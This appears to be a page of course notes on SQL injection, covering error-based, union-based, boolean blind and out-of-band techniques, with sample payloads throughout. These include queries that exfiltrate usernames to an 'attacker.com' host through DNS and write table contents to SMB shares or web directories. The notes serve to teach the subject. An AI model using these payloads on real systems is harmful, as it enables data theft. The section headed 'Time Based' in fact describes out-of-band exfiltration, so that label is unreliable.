Analysis and Exploration of Vulnerabilities

SQLi types

In Band (Classic)

Payload is provided and the result is determined directly.

  • E.g. user is logged in, data is obtained, and tables are deleted.

In-band means that the result arrives from the same channel used to provide the payload.

As seen previously in the examples.

In Band - Error Based

Relies on the existence of an error returned by the server.

  • Detecting the existence of a SQLi only requires the creation of a syntax error: ‘

Used when the service executes a query but doesn’t provide enough information for directly grabbing the data.

Detection using a single quote: http://site.com/items.php?id=2

Or extracting data: id=2OR CAST(NULLIF(CURRENT_USER, ‘admin') AS INT)

  • If CURRENT_USER is ‘admin’, NULL is returned and can be CAST to INT.

  • If CURRENT_USER is not ‘admin’, ‘admin’ is returned, and an error is triggered.

In Band - Union Based

Exploits the UNION operator to extract data from other tables.

Why? A query is restricted to a set of tables before the area where a payload may be injected

SELECT Users.name,Address.street from Users,Address where
Users.address_id = Address.id and Users.name = $name

Payload for $name will use the form: UNION(SELECT * from Products)

  • Table Products will be brought into the query.

Blind (Inferential)

Inferential / Blind exploitation occurs when the SQLi still occurs, but its result is not provided to the attacker.

  • Because developers blocked debug information.

  • Because the vulnerability is a simple query.

The existence of an SQLi is determined by a change in the service behavior.

  • Without the existence of an error.

  • Without exploiting forms or logins.

Blind – Content-Based

Detected using payloads with forced Boolean results.

Standard request: http://site.com/items.php?id=2

  • Always true: http://site.com/items.php?id=2 and 1=1

  • Always false: http://site.com/items.php?id=2 and 1=2

If a system is vulnerable requests will yield different results.

  • Always true: will return article 2 because id=2 and True is equivalent to id=2.

  • Always false: will fail because id=2 and False is always false

Blind – Time Based

Results in data being exfiltrated from additional channels.

  • Data, or the query status is registered in a resource available to the attacker.

DNS

SELECT LOAD_FILE(CONCAT('\\', (SELECT username FROM Users), '.attacker.com’));

  • A DNS query will be made to username.attacker.com

SMB Share

SELECT * FROM USERS INTO OUTFILE '\host\share\out.txt’

  • A file named out.txt is written to a server controlled by the attacker.

HTTP Dir

SELECT * FROM USERS INTO OUTFILE '/var/www/out.txt’

  • File out.txt is written to a directory made available through HTTP.

PreviousThe NULL plateNextSQL Injection - Avoiding

Last updated